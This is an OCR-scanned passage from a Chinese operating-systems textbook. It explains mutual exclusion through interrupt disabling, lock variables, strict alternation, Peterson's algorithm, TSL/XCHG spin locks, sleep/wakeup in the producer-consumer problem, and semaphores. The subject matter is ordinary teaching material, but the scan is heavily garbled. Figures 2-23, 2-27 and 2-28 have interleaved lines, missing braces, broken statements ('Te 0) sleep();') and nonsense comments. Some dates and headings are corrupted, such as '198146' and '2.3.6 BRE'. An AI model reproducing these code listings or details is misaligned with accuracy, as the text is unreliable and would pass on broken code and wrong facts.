程 队 列 之 类 的 数据 状态 不 一 致 时 发 生 中 断 ， 则 将 导致 竞争 条 件 。 所 以 结论 是 : 屏蔽 中 断 对 于 操作 系统 本 
身 而 言 是 一 项 很 有 用 的 技术 ， 但 对 于 用 户 进程 则 不 是 一 种 合适 的 通用 互 斥 机 制 。 

由 于 多 核 芯片 的 数量 越 来 越 多 ， 即 使 在 低 端 PC 上 也 是 如 此 。 因 此 ， 通 过 屏蔽 中 断 来 达到 互 斥 的 可 
能 性 一 一 甚至 在 内 核 中 一 一 变 得 日 益 减 少 了 。 双 核 现在 已 经 相当 普遍 ， 四 核 当前 在 高 端 机 器 中 存在 ， 而 
且 离 八 或 十 六 (〈 核 ) 也 不 久远 了 。 在 一 个 多 核 系 统 中 〈 例 如 ， 多 处 理 器 系统 ) ， 屏 项 一 个 CPU 的 中 断 不 
会 阻止 其 他 CPU 干预 第 一 个 CPU 所 做 的 操作 。 结 果 是 人 们 需要 更 加 复杂 的 计划 。 

2. 锁 变 量 

作为 第 二 种 尝试 ， 可 以 寻找 一 种 软件 解决 方案 。 设 想 有 一 个 共享 ( 锁 ) 变量 ， 其 初始 值 为 0。 当 一 
个 进程 想 进 入 其 临界 区 时 ， 它 首先 测试 这 把 锁 。 如 果 该 锁 的 值 为 0， 则 该 进程 将 其 设置 为 1 并 进入 临界 区 。 
若 这 把 锁 的 值 已 经 为 1， 则 该 进程 将 等 待 直到 其 值 变 为 0。 于 是 ，0 就 表示 临界 区 内 设 有 进程 ，1 表 示 已 经 
有 某 个 进程 进入 临界 区 。 

但 是 ， 这 种 想法 也 包含 了 与 假 脱 机 目录 一 样 的 疏漏 。 假 设 一 个 进程 读 出 锁 变 量 的 值 并 发 现 它 为 0， 
而 恰好 在 它 将 其 值 设置 为 1 之 前 ， 另 一 个 进程 被 调度 运行 ， 将 该 锁 变 量 设置 为 1。 当 第 一 个 进程 再 次 运行 
时 ， 它 同样 也 将 该 锁 设 置 为 1， 则 此 时 同时 有 两 个 进程 进入 临界 区 中 。 

可 能 读者 会 想 ， 先 读 出 锁 变 量 ， 紧 接着 在 改变 其 值 之 前 再 检查 一 遍 它 的 值 ， 这 样 便 可 以 解决 问题 。 
但 这 实际 上 无 济 于 事 ， 如 果 第 二 个 进程 恰好 在 第 一 个 进程 完成 第 二 次 检查 之 后 修改 了 锁 变 量 的 值 ， 则 同 
样 还 会 发 生 竞争 条 件 。 

3. 严格 轮换 法 

第 三 种 互 斥 的 方法 如 图 2-23 所 示 。 几 乎 与 本 书 中 所 有 其 他 程序 一 样 ， 这 里 的 程序 段 用 C 语 言 编 写 。 
之 所 以 选择 C 语 言 是 由 于 实际 的 操作 系统 普遍 用 C 语 言 编写 (或 偶尔 用 C++) ， 而 基本 上 不 用 像 Java、 
Modula3 或 Pascal 这 样 的 语言 。 对 于 编写 操作 系统 而 言 ，C 语 言 是 强大 、 有 效 、 可 预知 和 有 特性 的 语言 。 
而 对 于 Java， 它 就 不 是 可 预知 的 ， 因 为 它 在 关键 时 刻 会 用 完 存储 器 ， 而 在 不 合适 的 时 候 会 调用 垃圾 收集 
程序 回收 内 存 。 在 C 语 言 中 ， 这 种 情形 就 不 可 能 发 生 ， 因 为 C 语 言 中 不 需要 进行 空间 回收 。 有 关 C、C++、 
Java 和 其 他 四 种 语言 的 定量 比较 可 参阅 (Prechelt，2000)。 

在 图 2-23 中 ， 整 型 变量 turn， 初 始 值 为 0， 用 于 记录 轮 到 哪个 进程 进入 临界 区 ， 并 检查 或 更 新 共享 内 
存 。 开 始 时 ， 进 程 0 检 查 turn， 发 现 其 值 为 0， 于 是 进入 临界 区 。 进 程 1 也 发 现 其 值 为 0， 所 以 在 一 个 等 待 
循环 中 不 停 地 测试 turn， 看 其 值 何 时 变 为 1。 连 续 测 试 一 个 变量 直到 某 个 值 出 现 为 止 ， 称 为 忙 等 待 (busy 
waiting) 。 由 于 这 种 方式 浪费 CPU 时 间 ， 所 以 通常 应 该 避免 。 只 有 在 有 理由 认为 等 待 时 间 是 非常 短 的 情 
形 下 ， 才 使 用 忙 等 待 。 用 于 忙 等 待 的 锁 ， 称 为 自 旋 锁 (spin lock), 





while (TRUE) { 
while (turn != 0); /* 循环 */ 
critical_region( ); 


while (TRUE) { 
while (turn != 1); /* 循环 */ 
critical_region( ); 
turn = 1; turn = 0; 
noncritical_region( ); 


noncritical_region( ); 





} 
a) b) 


图 2-23 临界 区 问题 的 一 种 解法 (在 两 种 情况 下 请 注意 分 号 终止 了 while 语 句 ) : a) 进程 0，b) 进程 1 


进程 0 离开 临界 区 时 ， 它 将 turn 的 值 设置 为 1， 以 便 允 许 进程 1 进入 其 临界 区 。 假 设 进程 1 很 快 便 离开 
了 临界 区 ， 则 此 时 两 个 进程 都 处 于 临界 区 之 外 ，turn 的 值 又 被 设置 为 0。 现 在 进程 0 很 快 就 执行 完 其 整个 
循环 ， 它 退出 临界 区 ， 并 将 turn 的 值 设置 为 1。 此 时 ，turn 的 值 为 1， 两 个 进程 都 在 其 临界 区 外 执行 。 

突然 ， 进 程 0 结束 了 非 临界 区 的 操作 并 且 返 回 到 循环 的 开始 。 但 是 ， 这 时 它 不 能 进入 临界 区 ， 因 为 
turn 的 当前 值 为 1， 而 此 时 进程 1 还 在 忙于 非 临界 区 的 操作 ， 进 程 0 只 有 继续 while 循 环 ， 直 到 进程 1 把 turn 
的 值 改 为 0。 这 说 明 ， 在 一 个 进程 比 另 一 个 慢 了 很 多 的 情况 下 ， 轮 流 进入 临界 区 并 不 是 一 个 好 办 法 。 
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这 种 情况 违反 了 前 面 叙述 的 条 件 3: 进程 0 被 一 个 临界 区 之 外 的 进程 阻塞 。 再 回 到 前 面 假 脱 机 目录 的 
问题 ， 如 果 现 在 将 临界 区 与 读 写 假 脱 机 目录 相 联系 ， 则 进程 0 有 可 能 因为 进程 1 在 做 其 他 事情 而 被 禁止 打 
印 另 一 个 文件 。 

实际 上 ， 该 方案 要 求 两 个 进程 严格 地 轮流 进入 它们 的 临界 区 ， 如 假 脱 机 文件 等 。 任 何 一 个 进程 都 不 
可 能 在 一 轮 中 打印 两 个 文件 。 尽 管 该 算法 的 确 避 免 了 所 有 的 竞争 条 件 ， 但 由 于 它 违 反 了 条 件 3， 所 以 不 
能 作为 一 个 很 好 的 备 选 方案 。 

4. Peterson 解 法 

荷兰 数学 家 T. Dekker 通 过 将 锁 变 量 与 警告 变量 的 思想 相 结合 ， 最 早 提 出 了 一 个 不 需要 严格 轮换 的 软 
件 互 斥 算法 。 关 于 Dekker 的 算法 ， 请 参阅 (Dijkstra, 1965), 

198146, G. L. Peterson 发 现 了 一 种 简单 得 多 的 互 斥 算法 ， 这 使 得 Dekker 的 方法 不 再 有 任何 新 意 。 
Peterson 的 算法 如 图 2-24 所 示 。 该 算法 由 两 个 用 ANSI C 编 写 的 过 程 组 成 。ANSI C 要 求 为 所 定义 和 使 用 的 
所 有 函数 提供 函数 原型 。 不 过 ， 为 了 节省 篇 幅 ， 这 里 和 后 续 的 例子 中 我 们 都 不 会 给 出 函数 原型 。 


#define FALSE 0 


#define TRUE 1 J 
#define N 2 m 进程 数量 */ 


int turn; 履 现 在 轮 到 谁 ? */ 
int interested[N]; /* 所 有 值 初始 化 为 0 (FALSE) */ 


void enter_region(int process) /* 进程 是 0 或 1 */ 


int other; * 另 一 进程 号 */ 


other = 1 — process; /* 另 一 个 进程 */ 

interested[process] = TRUE; /# 表示 感 兴趣 */ 

turn = process; 们 设置 标 志 #/ 

while (turn == process && interested[other] == TRUE); /* 空 语 句 */ 
} 


void leave_region(int process) /* 进程 : 谁 离开 ? */ 


interested[process] = FALSE:; 履 表 示 离 开 临界 区 */ 
} 





图 2-24 完成 互 斥 的 Peterson 解 法 


在 使 用 共享 变量 ( 即 进入 其 临界 区 ) 之 前 ， 各 个 进程 使 用 其 进程 号 0 或 1 作为 参数 来 调用 enter_ 
region。 该 调用 在 需要 时 将 使 进程 等 待 ， 直 到 能 安全 地 进入 临界 区 。 在 完成 对 共享 变量 的 操作 之 后 ， 进 
程 将 调用 leave_region， 表 示 操 作 已 完成 ， 若 其 他 的 进程 希望 进入 临界 区 ， 则 现在 就 可 以 进入 。 

现在 来 看 看 这 个 方案 是 如 何 工作 的 。 一 开始 ， 没 有 任何 进程 处 于 临界 区 中 ， 现 在 进程 0 调用 enter_ 
region。 它 通过 设置 其 数组 元 素 和 将 turn 置 为 0 来 标识 它 希 望 进 入 临界 区 。 由 于 进程 1 并 不 想 进入 临界 区 ， 
所 以 enter_region 很 快 便 返 回 。 如 果 进 程 1 现在 调用 enter_region， 进 程 1 将 在 此 处 挂 起 直到 interested[0] 变 
成 FALSE， 该 事件 只 有 在 进程 0 调用 leave_region 退 出 临界 区 时 才 会 发 生 。 

现在 考虑 两 个 进程 几乎 同时 调用 enter_region 的 情况 。 它 们 都 将 自己 的 进程 号 存 人 turn， 但 只 有 后 被 
保存 进去 的 进程 号 才 有 效 ， 前 一 个 因 被 重 写 而 丢失 。 假 设 进程 1 是 后 存 和 人 的 ， 则 turn 为 1!。 当 两 个 进程 都 
运行 到 while 语 句 时 ， 进 程 0 将 循环 0 次 并 进入 临界 区 ， 而 进程 1 则 将 不 停 地 循环 且 不 能 进入 临界 区 ， 直 到 
进程 0 退出 临界 区 为 止 。 

5. TSL 指 令 

现在 来 看 需要 硬件 支持 的 一 种 方案 。 某 些 计算 机 中 ， 特 别 是 那些 设计 为 多 处 理 器 的 计算 机 ， 都 有 下 

TSL RX, LOCK 


ee ee 


称 为 测试 并 加 锁 (test and set lock)， 它 将 一 个 内 存 字 lock 读 到 寄存 器 RX 中 ， 然 后 在 该 内 存 地 址 上 存 一 
个 非 零 值 。 读 字 和 写字 操作 保证 是 不 可 分 割 的 ， 即 该 指令 结束 之 前 其 他 处 理 器 均 不 允许 访问 该 内 存 字 。 
执行 TSL 指 令 的 CPU 将 锁 住 内 存 总 线 ， 以 禁止 其 他 CPU 在 本 指令 结束 之 前 访问 内 存 。 

着 重 说 明 一 下 ， 锁 住 存 储 总 线 不 同 于 屏蔽 中 断 。 屏 蔽 中 断 ， 然 后 在 读 内 存 字 之 后 跟着 写 操作 并 不 能 
阻止 总 线 上 的 第 二 个 处 理 器 在 读 操作 和 写 操作 之 间 访 问 该 内 存 字 。 事 实 上 ， 在 处 理 器 1 上 屏蔽 中 断 对 处 
理 器 2 根本 没有 任何 影响 。 让 处 理 器 2 远离 内 存 直到 处 理 器 1 完成 的 唯一 方法 就 是 锁 住 总 线 ， 这 需要 一 个 
特殊 的 硬件 设施 (基本 上 ， 一 根 总 线 就 可 以 确保 总 线 由 锁 住 它 的 处 理 器 使 用 ， 而 其 他 的 处 理 器 不 能 用 )。 

为 了 使 用 TSL 指 令 ， 要 使 用 一 个 共享 变量 lock 来 协调 对 共享 内 存 的 访问 。 当 lock 为 0 时 ， 任 何 进程 
都 可 以 使 用 TSL 指 令 将 其 设置 为 1， 并 读 写 共 享 内 存 。 当 操作 结束 时 ， 进 程 用 一 条 普通 的 move 指 令 将 
lock 的 值 重 新 设置 为 0。 

这 条 指令 如 何 防止 两 个 进程 同时 进入 临界 区 呢 ? 解决 方案 如 图 2-25 所 示 。 假 定 (但 很 典型 ) 存在 如 
下 共 4 条 指令 的 汇编 语言 子 程序 。 第 一 条 指令 将 lock 原来 的 值 复 制 到 寄存 器 中 并 将 lock 设置 为 1， 随 后 这 
个 原来 的 值 与 0 相 比 较 。 如 果 它 非 零 ， 则 说 明 以 前 已 被 加 锁 ， 则 程序 将 回 到 开始 并 再 次 测试 。 经 过 或 长 
或 短 的 一 段 时 间 后 ， 该 值 将 变 为 0 (当前 处 于 临界 区 中 的 进程 退出 临界 区 时 ) ， 于 是 过 程 返回 ， 此 时 已 加 
锁 。 要 清除 这 个 锁 非 常 简单 ， 程 序 只 需 将 0 存 人 lock 即 可 ， 不 需要 特殊 的 同步 指令 。 


enter_region: 
TSL REGISTER,LOCK 复制 锁 到 寄存 器 并 将 锁 设 为 1 
CMP REGISTER,#0 锁 是 零 吗 ? 
JNE enter-region 若 不 是 零 ， 说 明 锁 已 被 设置 ， 所 以 循环 
RET 返回 调用 者 ， 进 入 了 临界 区 


leave_region: 
MOVE LOCK,#0 | 在 锁 中 存 和 0 
RET | 返回 调用 者 





图 2-25 用 TSL 指 令 进 入 和 离开 临界 区 


现在 有 一 种 很 明确 的 解法 了 。 进 程 在 进入 临界 区 之 前 先 调 用 enter_region， 这 将 导致 忙 等 待 ， 直 到 
锁 空闲 为 止 ， 随 后 它 获 得 该 锁 并 返回 。 在 进程 从 临界 区 返回 时 它 调 用 leave_region， 这 将 把 lock 设 置 为 0。 
与 基于 临界 区 问题 的 所 有 解法 一 样 ， 进 程 必须 在 正确 的 时 间 调 用 enter_region 和 leave_region， 解 法 才能 
奏效 。 如 果 一 个 进程 有 欺诈 行为 ， 则 互 斥 将 会 失败 。 换 言 之 ， 只 有 进程 合作 ， 临 界 区 才能 工作 。 

一 个 可 替代 TSL 的 指令 是 XCHG， 它 原子 性 地 交换 了 两 个 位 置 的 内 容 ， 例 如 ， 一 个 寄存 器 与 一 个 存 
储 器 字 。 代 码 如 图 2-26 所 示 ， 而 且 就 像 可 以 看 到 的 那样 ， 它 本 质 上 与 TSL 的 解决 办 法 一 样 。 所 有 的 Intel 
x86 CPU 在 低层 同步 中 使 用 XCHG 指 令 。 


enter_region: 
MOVE REGISTER,#1 | 在 寄存 器 中 放 一 个 1 
XCHG REGISTER,LOCK | 交换 寄存 器 与 锁 变 量 的 内 容 
CMP REGISTER,#0 | 锁 是 零 吗 ? 
JNE enter_region | 若 不 是 零 ， 说 明 锁 已 被 设置 ， 因 此 循环 


RET | 返回 调用 者 ， 进 入 临界 区 


leave_region: 
MOVE LOCK,#0 | 在 锁 中 存 入 0 
RET | 返回 调用 者 


图 2-26 用 XCHG 指 令 进 入 和 离开 临界 区 





2.3.4 睡眠 与 唤醒 
Peterson 解 法 和 TSL 或 XCHG 解 法 都 是 正确 的 , 但 它们 都 有 忙 等 待 的 缺点 。 这 些 解法 在 本 质 上 是 这 样 的 : 
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当 一 个 进程 想 进入 临界 区 时 ， 先 检查 是 否 允 许 进 入 ， 若 不 允许 ， 则 该 进程 将 原 地 等 待 ， 直 到 允许 为 止 。 

这 种 方法 不 仅 浪费 了 CPU 时 间 ， 而 且 还 可 能 引起 预想 不 到 的 结果 。 考 虑 一 台 计 算 机 有 两 个 进程 ，H 
优先 级 较 高 ，L 优 先 级 较 低 。 调 度 规则 规定 ， 只 要 H 处 于 就 绪 态 它 就 可 以 运行 。 在 某 一 时 刻 ，L 处 于 临界 
区 中 ， 此 时 H 变 到 就 绪 态 ， 准 备 运行 (例如 ， 一 条 1/O 操 作 结 束 )。 现 在 H 开 始 忙 等 待 ， 但 由 于 当 H 就 绪 时 
L 不 会 被 调度 ， 也 就 无 法 离开 临界 区 ， 所 以 H 将 永远 忙 等待 下 去 。 这 种 情况 有 时 被 称 作 优 先 级 反 转 问题 
(priority inversion problem) 。 

现在 来 考察 几 条 进程 间 通 信和 原 语 ， 它 们 在 无 法 进入 临界 区 时 将 阻塞， 而 不 是 忙 等 待 。 最 简单 的 是 
sleep 和 wakeup。sleep 是 一 个 将 引起 调用 进程 阻塞 的 系统 调用 ， 即 被 挂 起， 直到 另外 一 个 进程 将 其 唤 
醒 。wakeup 调 用 有 一 个 参数 ， 即 要 被 唤醒 的 进程 。 另 一 种 方法 是 让 sleep 和 wakeup 各 有 一 个 参数 ， 即 
有 一 个 用 于 匹配 sleep 和 wakeup 的 内 存 地 址 。 

生产 者 -消费 者 问题 

作为 使 用 这 些 原 语 的 一 个 例子 ， 我 们 考虑 生产 者 -消费 者 (producer-consumer) 问题 ， 也 称 作 有 界 
缓冲 区 (bounded-buffer) 问题 。 两 个 进程 共享 一 个 公共 的 固定 大 小 的 缓冲 区 。 其 中 一 个 是 生产 者 ， 将 
信息 放 入 缓冲 区 ， 另 一 个 是 消费 者 ， 从 缓冲 区 中 取出 信息 。( 也 可 以 把 这 个 问题 一 般 化 为 m 个 生产 者 和 nn 
个 消费 者 问题 ,但 是 这 里 只 讨论 一 个 生产 者 和 一 个 消费 者 的 情况 ， 这 样 可 以 简化 解决 方案 。) 

问题 在 于 当 缓 冲 区 已 满 ， 而 此 时 生产 者 还 想 向 其 中 放 入 一 个 新 的 数据 项 的 情况 。 其 解决 办 法 是 让 生 
产 者 睡眠 ， 待 消费 者 从 缓冲 区 中 取出 一 个 或 多 个 数据 项 时 再 唤醒 它 。 同 样 地 ， 当 消费 者 试图 从 缓冲 区 中 
取 数 据 而 发 现 缓冲 区 为 空 时 ， 消 费 者 就 睡眠 ， 直 到 生产 者 向 其 中 放 和 一些 数据 时 再 将 其 唤醒 。 

这 个 方法 昕 起 来 很 简单 ， 但 它 包含 与 前 边 假 脱 机 目录 问题 一 样 的 竞争 条 件 。 为 了 跟踪 缓冲 区 中 的 数 
据 项 数 ， 需 要 一 个 变量 count。 如 果 缓 冲 区 最 多 存放 N 个 数据 项 ， 则 生产 者 代码 将 首先 检查 count 是 否 达到 
N,， 若 是 ， 则 生产 者 睡眠 ;否则 生产 者 向 缓冲 区 中 放 和 一 个 数据 项 并 增 量 count 的 值 。 

消费 者 的 代码 与 此 类 似 : 首先 测试 count 是 否 为 0， 若 是 ， 则 睡眠 ， 否 则 从 中 取 走 一 个 数据 项 并 递减 count 
的 值 。 每 个 进程 同时 也 检测 另 一 个 进程 是 否 应 被 唤醒 ， 若 是 则 唤醒 之 。 生 产 者 和 消费 者 的 代码 如 图 2-27 所 示 。 


#define N 100 人 # 缓 冲 区 中 的 槽 数目 */ 
int count = 0; 让 缓冲 区 中 的 数据 项 数目 */ 


void producer(void) 


int item; 


while (TRUE) { 虚无 限 循环 */ 
item = produce_item( ); 人 # 产生 下 一 新 数据 项 */ 
if (count == N) sleep(); /* 如 果 缓 冲 区 满 了 ， 就 进入 休眠 状态 */ 
insert_item(item); Pee Bt) 数据 项 放 入 缓冲 区 中 */ 
count = count + 1; 1 将 缓冲 区 的 数据 项 计数 器 增 1 */ 
if (count == 1) wakeup(consumer); /* Bab Asn. */ 


} 
} 


void consumer(void) 
int item; 


i 此 无 限 循环 */ 

Te 0) sleep(); 上 # 如 果 缓 冲 区 空 ， 则 进入 休眠 状态 */ 
item = remove_item( ); 上 # 从 缓冲 区 中 取出 一 个 数据 项 */ 
count = count — 1; /# 将 缓冲 区 的 数据 项 计数 器 减 1 */ 
if (count == N — 1) wakeup(producer); 人 # 缓 冲 区 满 吗 ? */ 
consume _item(item); /* 打印 数据 项 */ 








图 2-27 含有 严重 竞争 条 件 的 生产 者 一 消费 者 问题 
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为 了 在 C 语 言 中 表示 sleep 和 wakeup 这 样 的 系统 调用 ， 我 们 将 以 库 函 数 调 用 的 形式 来 表示 。 尽 管 它 
们 不 是 标准 C 库 的 一 部 分 ， 但 在 实际 上 任何 系统 中 都 具有 这 些 库 函数 。 未 列 出 的 过 程 insert_item 和 
remove_item 用 来 记录 将 数据 项 放 入 缓冲 区 和 从 缓冲 区 取出 数据 等 事项 。 

现在 回 到 竞争 条 件 的 问题 。 这 里 有 可 能 会 出 现 竞争 条 件 ， 其 原因 是 对 count 的 访问 未 加 限制 。 有 可 
能 出 现 以 下 情况 : 缓冲 区 为 空 ， 消 费 者 刚刚 读 取 count 的 值 发 现 它 为 0。 此 时 调度 程序 决定 暂停 消费 者 并 
启动 运行 生产 者 。 生 产 者 向 缓冲 区 中 加 入 一 个 数据 项 ，count 加 1。 现 在 count 的 值 变 成 了 1。 它 推断 认为 
由 于 count 刚 才 为 0， 所 以 消费 者 此 时 一 定 在 睡 眼 ， 于 是 生产 者 调用 wakeup 来 唤醒 消费 者 。 

但 是 ， 消 费 者 此 时 在 逻辑 上 并 未 睡眠 ， 所 以 wakeup 信 和 号 丢失 。 当 消费 者 下 次 运行 时 ， 它 将 测试 先 
前 读 到 的 count 值 ， 发 现 它 为 0， 于 是 睡眠 。 生 产 者 迟早 会 填 满 整个 缓冲 区 ， 然 后 睡 眼 。 这 样 一 来 ， 两 个 
进程 都 将 永远 睡眠 下 去 。 

问题 的 实质 在 于 发 给 一 个 ( 尚 ) 未 睡眠 进程 的 wakeup 信 号 丢失 了 。 如 果 它 没有 丢失 ， 则 一 切 都 很 
正常 。 一 种 快速 的 弥补 方法 是 修改 规则 ， 加 上 一 个 唤醒 等 待 位 。 当 一 个 wakeup 信 号 发 送 给 一 个 清醒 的 进 
程 信号 时 ， 将 该 位 置 1。 随 后 ， 当 该 进程 要 睡眠 时 ， 如 果 唤 醒 等 待 位 为 1， 则 将 该 位 清除 ， 而 该 进程 仍然 
保持 清醒 。 唤 醒 等 待 位 实际 上 就 是 wakeup 信 号 的 一 个 小 仓库 。 

尽管 在 这 个 简单 例子 中 用 唤醒 等 待 位 的 方法 解决 了 问题 ， 但 是 我 们 可 以 很 容易 就 构造 出 一 些 例子 ， 
其 中 有 三 个 或 更 多 的 进程 ， 这 时 一 个 唤醒 等 待 位 就 不 够 使 用 了 。 于 是 我 们 可 以 再 打 一 个 补丁 ， 加 入 第 二 
个 唤醒 等 待 位 ， 蕉 至 是 8 个 、32 个 等 ， 但 原则 上 讲 ， 这 并 没有 从 根本 上 解决 问题 。 


2.3.5 信号 量 

信号 量 是 E. W. Dijkstra 在 1965 年 提出 的 一 种 方法 ， 它 使 用 一 个 整 型 变量 来 累计 唤醒 次 数 ， 供 以 后 使 
用 。 在 他 的 建议 中 引入 了 一 个 新 的 变量 类 型 ， 称 作 信号 量 (semaphore) 。 一 个 信号 量 的 取 值 可 以 为 0 
(表示 没有 保存 下 来 的 唤醒 操作 ) 或 者 为 正 值 (表示 有 一 个 或 多 个 唤醒 操作 ) 。 

Dijkstra 建 议 设立 两 种 操作 : down 和 up (分 别 为 一 般 化 后 的 sleep 和 wakeup)。 对 一 信号 量 执行 
down 操 作 ， 则 是 检查 其 值 是 否 大 于 0。 若 该 值 大 于 0， 则 将 其 值 减 1 ( 即 用 掉 一 个 保存 的 唤醒 信号 ) 并 继 
续 ， 若 该 值 为 0， 则 进程 将 睡眠 ， 而 且 此 时 down 操 作 并 未 结束 。 检 查 数值 、 修 改变 量 值 以 及 可 能 发 生 的 
睡眠 操作 均 作 为 一 个 单一 的 、 不 可 分 割 的 原子 操作 完成 。 保 证 一 旦 一 个 信号 量 操作 开始 ， 则 在 该 操作 完 
成 或 阻塞 之 前 ， 其 他 进程 均 不 允许 访问 该 信号 量 。 这 种 原子 性 对 于 解决 同步 问题 和 避免 竞争 条 件 是 绝对 
必要 的 。 所 谓 原子 操作 ， 是 指 一 组 相关 联 的 操作 要 么 都 不 间断 地 执行 ， 要 么 都 不 执行 。 原 子 操作 在 计算 
机 科学 的 其 他 领域 也 是 非常 重要 的 。 

up 操作 对 信号 量 的 值 增 1。 如 果 一 个 或 多 个 进程 在 该 信号 量 上 睡眠 , 无 法 完成 一 个 先前 的 down 操 作 ， 
则 由 系统 选择 其 中 的 一 个 (如 随机 挑选 ) 并 人 允许 该 进程 完成 它 的 down 操 作 。 于 是 ， 对 一 个 有 进程 在 其 
上 睡眠 的 信号 量 执行 一 次 up 操作 之 后 ， 该 信号 量 的 值 仍 旧 是 0， 但 在 其 上 睡眠 的 进程 却 少 了 一 个 。 信 和 号 
量 的 值 增 1 和 唤醒 一 个 进程 同样 也 是 不 可 分 割 的 。 不 会 有 某 个 进程 因 执行 up 而 阻塞 ， 正 如 在 前 面 的 模型 
中 不 会 有 进程 因 执行 wakeup 而 阻塞 一 样 。 

顺便 提 一 下 ， 在 Dijkstra 原 来 的 论文 中 ， 他 分 别 使 用 名 称 P 和 V 而 不 是 down 和 up ， 荷 兰 语 中 ， 
Proberen 的 意思 是 尝试 ，Verhogen 的 含义 是 增加 或 升 高 。 由 于 对 于 不 讲 荷兰 语 的 读者 来 说 采用 什么 记号 
并 无 大 的 干系 ， 所 以 ， 这 里 将 使 用 down 和 up 名 称 。 它 们 在 程序 设计 语言 Algol 68 中 首次 引入 。 

用 信号 量 解决 生产 者 -消费 者 问题 

用 信号 量 解决 丢失 的 wakeup 问 题 ， 如 图 2-28 所 示 。 为 确保 信号 量 能 正确 工作 ， 最 重要 的 是 要 采用 一 
种 不 可 分 割 的 方式 来 实现 它 。 通 常 是 将 up 和 down 作 为 系统 调用 实现 ， 而 且 操 作 系 统 只 需 在 执行 以 下 操 
作 时 暂时 屏蔽 全 部 中 断 : 测试 信号 量 、 更 新 信号 量 以 及 在 需要 时 使 某 个 进程 睡眠 。 由 于 这 些 动作 只 需要 
几 条 指令 ， 所 以 屏蔽 中 断 不 会 带 来 什么 副作用 。 如 果 使 用 多 个 CPU， 则 每 个 信号 量 应 由 一 个 锁 变 量 进行 
保护 。 通 过 TSL 或 XCHG 指 令 来 确保 同一 时 刻 只 有 一 个 CPU 在 对 信号 量 进行 操作 。 

读者 必须 搞 清楚 ， 使 用 TSL 或 XCHG 指 令 来 防止 几 个 CPU 同 时 访问 一 个 信号 量 ， 这 与 生产 者 或 消费 
者 使 用 忙 等 待 来 等 待 对 方 腾 出 或 填充 缓冲 区 是 完全 不 同 的 。 信 号 量 操作 仅 需 几 个 毫秒 ， 而 生产 者 或 消费 
者 则 可 能 需要 任意 长 的 时 间 。 

该 解决 方案 使 用 了 三 个 信号 量 : 一 个 称 为 full， 用 来 记录 充满 的 缓冲 槽 数目 ， 一 个 称 为 empty， 记 录 
空 的 缓冲 槽 数目 ， 一 个 称 为 mutex， 用 来 确保 生产 者 和 消费 者 不 会 同时 访问 缓冲 区 。full 的 初 值 为 0， 
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empty 的 初 值 为 缓冲 区 中 槽 的 数目 ，mutex 初 值 为 1。 供 两 个 或 多 个 进程 使 用 的 信号 量 ， 其 初 值 为 1， 保 证 
同时 只 有 一 个 进程 可 以 进入 临界 区 ， 称 作 二 元 信号 量 (binary semaphore) 。 如 果 每 个 进程 在 进入 临界 区 
前 都 执行 一 个 down 操 作 ， 并 在 刚刚 退出 时 执行 一 个 up 操作 ， 就 能 够 实现 互 斥 。 

在 有 了 进程 间 通 信 原 语 之 后 ， 我 们 观察 一 下 图 2-5 中 的 中 断 顺序 。 在 使 用 信号 量 的 系统 中 ， 隐 藏 中 断 的 
最 自然 的 方法 是 为 每 一 个 IO 设备 设置 一 个 信号 量 ， 其 初 值 为 0。 在 启动 一 个 IO 设备 之 后 ， 管 理 进程 就 立即 对 
相关 联 的 信号 量 执行 一 个 down 操 作 ， 于 是 进程 立即 被 阻塞 。 当 中 断 到 来 时 ， 中 断 处 理 程序 随后 对 相关 信和 号 
量 执行 一 个 up 操作 ， 从 而 将 相关 的 进程 设置 为 就 绪 状 态 。 在 该 模型 中 ， 图 2-5 中 的 第 5 步 包 括 在 设备 的 信号 量 
上 执行 up 操作 ， 这 样 在 第 6 步 中 ， 调 度 程序 将 能 执行 设备 管理 和 程序。 当然， 如果 这 时 有 几 个 进程 就 绪 ， 则 调 
度 程序 下 次 可 以 选择 一 个 更 为 重要 的 进程 来 运行 。 本 章 的 后 续 内 容 中 ， 我 们 将 看 到 调度 算法 是 如 何 进行 的 。 

图 2-28 的 例子 实际 上 是 通过 两 种 不 同 的 方式 来 使 用 信号 量 的 ， 两 者 之 间 的 区 别 是 很 重要 的 。 信 和 号 量 
mutex 用 于 互 斥 ， 它 用 于 保证 任 一 时 刻 只 有 一 个 进程 读 写 缓冲 区 和 相关 的 变量 。 互 斥 是 避免 混乱 所 必需 
的 操作 。 在 下 一 节 中 ， 我 们 将 讨论 互 斥 量 及 其 实现 方法 。 


#define N 100 
typedef int semaphore; 
semaphore mutex = 1; 
semaphore empty = N; 
semaphore full = 0; 
void producer(void) 

int item; 


while (TRUE) { > 


item = produce_item( ); 


down(&empty); 
down(&mutex); 
insert_item(item); 
up(&mutex); 
up(&full); 
} 
} 


void consumer(void) 
int item; 
while (TRUE) { 


down(&full); 
down(&mutex); 


item = remove _item(); 


up(&mutex); 
up(&empty); 
consume _item(item); 


/* Reich oe Hp AY HY Be E */ 

1 信号 量 是 一 种 特殊 的 整 型 数据 */ 
上 # 控制 对 临界 区 的 访问 */ 

让 计数 缓冲 区 的 空 槽 数目 */ 

上 # 计数 缓冲 区 的 满 槽 数目 */ 


/* TRUE 是 常量 1 */ 

/* 产生 放 在 缓冲 区 中 的 一 些 数据 */ 
/* 将 空 槽 数目 减 1 */ 

/# 进入 临界 区 */ 

人 # 将 新 数据 项 放 到 缓冲 区 中 */ 

人 # 离开 临界 区 */ 

/# 将 满 槽 的 数目 加 1 #/ 


虚无 限 循 环 */ 

上 # 将 满 槽 数目 减 1 */ 

人 # 进 入 临界 区 */ 

上 # 从 缓冲 区 中 取出 数据 项 */ 
此 离开 临界 区 */ 

上 # 将 空 槽 数目 加 1 */ 

/* 处 理 数据 项 */ 





图 2-28 使 用 信号 量 的 生产 者 一 消费 者 问题 


信号 量 的 另 一 种 用 途 是 用 于 实现 同步 (synchronization)。 信 号 量 full 和 empty 用 来 保证 某 种 事件 的 顺 
序 发 生 或 不 发 生 。 在 本 例 中 ， 它 们 保证 当 缓冲 区 满 的 时 候 生产 者 停止 运行 ， 以 及 当 缓冲 区 空 的 时 候 消 费 
者 停止 运行 。 这 种 用 法 与 互 斥 是 不 同 的 。 
2.3.6 BRE 

如 果 不 需要 信号 量 的 计数 能 力 ， 有 时 可 以 使 用 信号 量 的 一 个 简化 版 本 ， 称 为 互 斥 量 (mutex), HJR 
量 仅仅 适用 于 管理 共享 资源 或 一 小 段 代 码 。 由 于 互 斥 量 在 实现 时 既 容易 又 有 效 ， 这 使 得 互 斥 量 在 实现 用 
户 空间 线程 包 时 非常 有 用 。 
